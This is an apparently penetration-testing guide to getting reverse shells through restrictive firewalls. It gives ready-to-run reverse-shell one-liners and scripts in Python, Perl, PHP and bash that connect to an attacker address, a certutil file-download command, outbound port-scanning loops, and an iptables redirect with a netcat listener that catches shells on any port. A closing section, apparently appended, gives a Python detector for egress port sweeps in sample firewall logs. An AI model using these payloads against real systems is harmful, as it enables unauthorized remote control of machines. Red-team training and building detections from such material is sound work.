Common Failure Scenarios
When a reverse shell connection attempt fails, it is typically due to one of four restrictive configurations: missing command execution capabilities, strict outbound IP filtering, blocked outbound ports, or protocol-specific firewall rules. Identifying the specific restriction is the first step toward selecting an appropriate bypass method.
Execution Environment Limitations
Even if network connectivity exists, the target system may lack the necessary binaries or permissions to execute a standard shell. While bash is the most common target, alternative languages can be used if the interpreter is available.
Python Execution
import socket, subprocess, os, pty
host = '10.0.0.5'
port = 8888
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
os.dup2(sock.fileno(), 0)
os.dup2(sock.fileno(), 1)
os.dup2(sock.fileno(), 2)
pty.spawn("/bin/bash")
sock.close()
Perl Execution
use Socket;
my $target_ip = '10.0.0.5';
my $target_port = 8888;
socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(S, sockaddr_in($target_port, inet_aton($target_ip)))) {
open(STDIN, ">&S");
open(STDOUT, ">&S");
open(STDERR, ">&S");
exec("/bin/sh -i");
};
PHP Execution
$sock = fsockopen("10.0.0.5", 8888);
exec("/bin/sh -i <&3 >&3 2>&3");
Bash Alternative
exec 5<>/dev/tcp/10.0.0.5/8888
while read line 0<&5; do $line 2>&5 >&5; done
Strict Egress IP Filtering
If the firewall is configured to whitelist specific outbound IPs, a reverse shell will fail unless the attacker's IP is on that list. In this scenario, the only viable option is to pivot through a compromised host within the allowed network range to relay the traffic.
Protocol Restrictions
Firewalls may allow traffic only on specific protocols such as HTTP, DNS, or ICMP. Detecting allowed protocols helps in choosing the right exfiltration or tunneling method.
Testing HTTP/HTTPS
On Linux, standard tools like curl or wget can verify connectivity.
curl -I http://192.168.1.100
wget --spider http://192.168.1.100
On Windows, use PowerShell or system utilities.
powershell -Command "Invoke-WebRequest -Uri http://192.168.1.100 -UseBasicParsing"
certutil -urlcache -split -f http://192.168.1.100/test.txt
Testing ICMP
Use tcpdump or tshark on the listening server to confirm whether ICMP packets traverse the firewall.
sudo tcpdump -i eth0 icmp
# Or using tshark
sudo tshark -i eth0 -f "icmp"
Testing DNS
Verify whether the target can resolve external domains using nslookup or dig.
nslookup example.com
dig example.com @8.8.8.8
Outbound Port Filtering
When only specific ports are allowed for outbound traffic, identifying these open ports is necessary. The following scripts scan common ports to test connectivity.
Linux Port Scanning
Using bash built-ins to check connectivity against a known external host (e.g., 8.8.8.8).
for port in 80 443 53 8080 21 22; do
timeout 1 bash -c "echo > /dev/tcp/8.8.8.8/$port" && echo "Port $port is open" || echo "Port $port is closed"
done
Windows Port Scanning
Using PowerShell with .NET classes to test port availability.
$ports = 80, 443, 8080, 53
$target = "8.8.8.8"
foreach ($p in $ports) {
try {
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect($target, $p)
Write-Host "Port $p open"
$client.Close()
} catch {
Write-Host "Port $p closed"
}
}
Catching Traffic on Any Port
Instead of guessing the open port, iptables can be configured on the attack server to redirect traffic arriving on all ports to a single listener. This allows the attacker to listen on any interface and capture the connection regardless of which outbound port the target is permitted to use.
# Save current rules
iptables-save > /tmp/iptables_backup.rules
# Redirect all TCP traffic (excluding system ports) to port 4444
iptables -t nat -A PREROUTING -p tcp --dport 1025:65535 -j REDIRECT --to-ports 4444
# Start the listener
nc -lvnp 4444
# Restore rules after the session
iptables-restore < /tmp/iptables_backup.rules
If the environment permits, using Metasploit payloads such as reverse_tcp_allports can automate this process by attempting connections across multiple ports until one succeeds.
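From the defender's side, the port-scanning loops under Outbound Port Filtering above leave a distinctive trace in egress-deny logs: one internal host hitting many distinct destination ports on one external address within seconds. The following is an added example, not code from the original page, that flags that pattern; the iptables-style log format, the field names (SRC, DST, PROTO, DPT) and the sample lines are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed iptables-style egress-deny log lines (not real data). The 10.0.0.23
# entries are what the bash port loop above leaves behind: six ports on 8.8.8.8
# within six seconds. 10.0.0.7 and the UDP line are ordinary background noise.
SAMPLE_LOGS = [
    "2024-05-01T10:00:00 fw kernel: EGRESS-DROP SRC=10.0.0.7 DST=203.0.113.10 PROTO=TCP SPT=40001 DPT=8443",
    "2024-05-01T10:00:01 fw kernel: EGRESS-DROP SRC=10.0.0.23 DST=8.8.8.8 PROTO=TCP SPT=51001 DPT=80",
    "2024-05-01T10:00:02 fw kernel: EGRESS-DROP SRC=10.0.0.23 DST=8.8.8.8 PROTO=TCP SPT=51002 DPT=443",
    "2024-05-01T10:00:03 fw kernel: EGRESS-DROP SRC=10.0.0.23 DST=8.8.8.8 PROTO=TCP SPT=51003 DPT=53",
    "2024-05-01T10:00:04 fw kernel: EGRESS-DROP SRC=10.0.0.23 DST=8.8.8.8 PROTO=TCP SPT=51004 DPT=8080",
    "2024-05-01T10:00:05 fw kernel: EGRESS-DROP SRC=10.0.0.23 DST=8.8.8.8 PROTO=TCP SPT=51005 DPT=21",
    "2024-05-01T10:00:06 fw kernel: EGRESS-DROP SRC=10.0.0.23 DST=8.8.8.8 PROTO=TCP SPT=51006 DPT=22",
    "2024-05-01T10:00:07 fw kernel: EGRESS-DROP SRC=10.0.0.9 DST=8.8.8.8 PROTO=UDP SPT=33001 DPT=53",
]

def parse_line(line):
    """Return (timestamp, src, dst, dport) for a TCP deny line, else None."""
    tokens = line.split()
    fields = dict(t.split("=", 1) for t in tokens[1:] if "=" in t)
    if not tokens or fields.get("PROTO") != "TCP" or not {"SRC", "DST", "DPT"} <= fields.keys():
        return None
    return datetime.fromisoformat(tokens[0]), fields["SRC"], fields["DST"], int(fields["DPT"])

def find_egress_sweeps(lines, min_ports=4, window=timedelta(seconds=10)):
    """Map each source IP that hit >= min_ports distinct blocked destination ports
    on a single external host within `window` to the sorted list of those ports."""
    events = defaultdict(list)            # (src, dst) -> [(ts, dport), ...]
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, src, dst, dport = parsed
            events[(src, dst)].append((ts, dport))
    sweeps = {}
    for (src, dst), evs in events.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):  # slide the window over each start time
            ports = {p for t, p in evs[i:] if t - start <= window}
            if len(ports) >= min_ports:
                sweeps[src] = sorted(ports)
                break
    return sweeps

if __name__ == "__main__":
    for src, ports in find_egress_sweeps(SAMPLE_LOGS).items():
        print(f"possible egress port sweep from {src}: ports {ports}")
```

Tune min_ports and window to the environment's normal deny-log volume; a single blocked port per host, as with 10.0.0.7 here, is not reported.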